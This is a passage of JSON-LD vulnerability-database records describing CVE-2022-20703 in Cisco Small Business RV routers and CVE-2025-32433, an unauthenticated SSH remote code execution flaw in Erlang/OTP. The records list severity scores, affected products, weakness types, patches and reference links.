                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-20703",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV Series routers contain an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the handling of firmware updates. The issue results from the lack of proper validation of a firmware image when performing an upgrade. An attacker can leverage this vulnerability to execute code in the context of root",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          }
        ],
        "trust": 2.97
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20703",
            "trust": 4.7
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-413",
            "trust": 2.4
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15810",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15611",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020301",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "id": "VAR-202202-0323",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2025-11-18T15:12:16.025000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 1.4,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=183257"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Known Exploited Vulnerabilities Detector",
            "trust": 0.1,
            "url": "https://github.com/Ostorlab/KEV "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          },
          {
            "title": "Threatpost",
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-295",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 2.4,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-408/"
          },
          {
            "trust": 1.7,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-413/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20703"
          },
          {
            "trust": 1.0,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=cve-2022-20703"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020301"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/295.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://threatpost.com/critical-cisco-bugs-vpn-routers-cyberattacks/178199/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "date": "2023-04-18T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "date": "2022-02-10T18:15:09.197000",
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-413"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-408"
          },
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20703"
          },
          {
            "date": "2023-06-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          },
          {
            "date": "2023-04-18T04:41:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          },
          {
            "date": "2025-10-28T13:58:12.787000",
            "db": "NVD",
            "id": "CVE-2022-20703"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Series router out-of-bounds write vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004543"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-164"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202504-1178

    Vulnerability from variot - Updated: 2025-11-18 15:12

    Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, an SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or preventing access via firewall rules. Erlang/OTP and products from multiple other vendors contain a vulnerability related to missing authentication for a critical function. Information may be obtained or tampered with, and the system may be put into a denial-of-service (DoS) state.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202504-1178",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "confd basic",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.0.18"
          },
          {
            "model": "confd basic",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.1.16.2"
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.3.8.1"
          },
          {
            "model": "smart phy",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "25.2"
          },
          {
            "model": "rv260w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "confd basic",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.4"
          },
          {
            "model": "cloud native broadband network gateway",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2025.03.1"
          },
          {
            "model": "network services orchestrator",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.3"
          },
          {
            "model": "network services orchestrator",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.8"
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.2.11.1"
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.4.4.1"
          },
          {
            "model": "rv260p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "staros",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2025.03"
          },
          {
            "model": "confd basic",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.2.11.1"
          },
          {
            "model": "inode manager",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv160w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv260",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv340w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "confd basic",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.4.4.1"
          },
          {
            "model": "ncs 2000 shelf virtualization orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "25.1.1"
          },
          {
            "model": "erlang\\/otp",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "erlang",
            "version": "27.0"
          },
          {
            "model": "erlang\\/otp",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "erlang",
            "version": "27.3.3"
          },
          {
            "model": "ultra cloud core",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2025.03.1"
          },
          {
            "model": "rv160",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "confd basic",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.2"
          },
          {
            "model": "rv345p",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "optical site manager",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "25.2.1"
          },
          {
            "model": "ultra services platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "5.7.19.1"
          },
          {
            "model": "confd basic",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.3.8.1"
          },
          {
            "model": "erlang\\/otp",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "erlang",
            "version": "25.3.2.20"
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.1.16.2"
          },
          {
            "model": "network services orchestrator",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.4.2"
          },
          {
            "model": "confd basic",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "8.3"
          },
          {
            "model": "network services orchestrator",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.4"
          },
          {
            "model": "rv340",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "erlang\\/otp",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "erlang",
            "version": "26.2.5.11"
          },
          {
            "model": "confd basic",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "7.7.19.1"
          },
          {
            "model": "enterprise nfv infrastructure software",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "4.18"
          },
          {
            "model": "network services orchestrator",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.2"
          },
          {
            "model": "network services orchestrator",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "6.4.1.1"
          },
          {
            "model": "erlang\\/otp",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "erlang",
            "version": "26.0"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "debian",
            "version": "11.0"
          },
          {
            "model": "ultra packet core",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "2025.03"
          },
          {
            "model": "rv345",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "cisco ultra cloud core",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco enterprise nfv infrastructure software",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco intelligent node manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "confd basic",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco ultra packet core",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco cloud native broadband network gateway",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco optical site manager",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco ultra services platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "erlang/otp",
            "scope": null,
            "trust": 0.8,
            "vendor": "erlang",
            "version": null
          },
          {
            "model": "cisco network services orchestrator",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco ncs 2000 shelf virtualization orchestrator",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco staros",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco smart phy",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "cve": "CVE-2025-32433",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "security-advisories@github.com",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2025-32433",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "OTHER",
                "availabilityImpact": "High",
                "baseScore": 10.0,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2025-006839",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "security-advisories@github.com",
                "id": "CVE-2025-32433",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "OTHER",
                "id": "JVNDB-2025-006839",
                "trust": 0.8,
                "value": "Critical"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, an SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround is to disable the SSH server or to prevent access to it via firewall rules. Erlang/OTP from ERLANG and products from multiple other vendors contain a vulnerability related to the lack of authentication for critical functions. Information may be obtained or tampered with, and service operation may be interrupted (DoS).",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          }
        ],
        "trust": 1.62
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2025-32433",
            "trust": 2.6
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2025/04/16/2",
            "trust": 1.8
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2025/04/18/1",
            "trust": 1.8
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2025/04/19/1",
            "trust": 1.8
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2025/04/18/6",
            "trust": 1.8
          },
          {
            "db": "OPENWALL",
            "id": "OSS-SECURITY/2025/04/18/2",
            "trust": 1.8
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-25-140-07",
            "trust": 0.8
          },
          {
            "db": "JVN",
            "id": "JVNVU96418823",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "id": "VAR-202504-1178",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2025-11-18T15:12:07.123000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page",
            "trust": 0.8,
            "url": "https://github.com/erlang/otp/commit/6eef04130afc8b0ccb63c9a0d8650209cf54892f"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-306",
            "trust": 1.0
          },
          {
            "problemtype": "Lack of authentication for critical features (CWE-306) [ others ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2025-006839"
          },
          {
            "db": "NVD",
            "id": "CVE-2025-32433"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.8,
            "url": "http://www.openwall.com/lists/oss-security/2025/04/16/2"
          },
          {
            "trust": 1.8,
            "url": "http://www.openwall.com/lists/oss-security/2025/04/18/1"
          },
          {
            "trust": 1.8,
            "url": "http://www.openwall.com/lists/oss-security/2025/04/18/2"
          },
          {
            "trust": 1.8,
            "url": "http://www.openwall.com/lists/oss-security/2025/04/18/6"
          },
          {
            "trust": 1.8,
